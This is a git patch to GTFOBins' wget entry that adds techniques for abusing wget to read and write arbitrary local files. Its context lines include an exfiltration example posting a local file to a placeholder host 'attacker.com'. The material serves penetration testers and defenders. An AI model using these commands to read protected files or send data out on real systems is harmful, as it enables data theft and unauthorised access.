From be0ff3ade6a27ea913ef9b76077f5ef8ff745eeb Mon Sep 17 00:00:00 2001
From: LinuxSploit <68427058+LinuxSploit@users.noreply.github.com>
Date: Sat, 15 May 2021 22:21:30 +0500
Subject: [PATCH] Add wget file-read/write

---
 _gtfobins/wget.md | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index e8297cf..52625c6 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -6,6 +6,18 @@ functions:
         URL=http://attacker.com/
         LFILE=file_to_send
         wget --post-file=$LFILE $URL
+  file-read:
+    - description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
+      code: |
+        LFILE=file_to_read
+        wget -i $LFILE
+  file-write:
+    - description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
+      code: |
+        LFILE=file_to_write
+        TF=$(mktemp)
+        echo DATA > $TF
+        wget -i $TF -o $LFILE
   file-download:
     - description: Fetch a remote file via HTTP GET request.
       code: |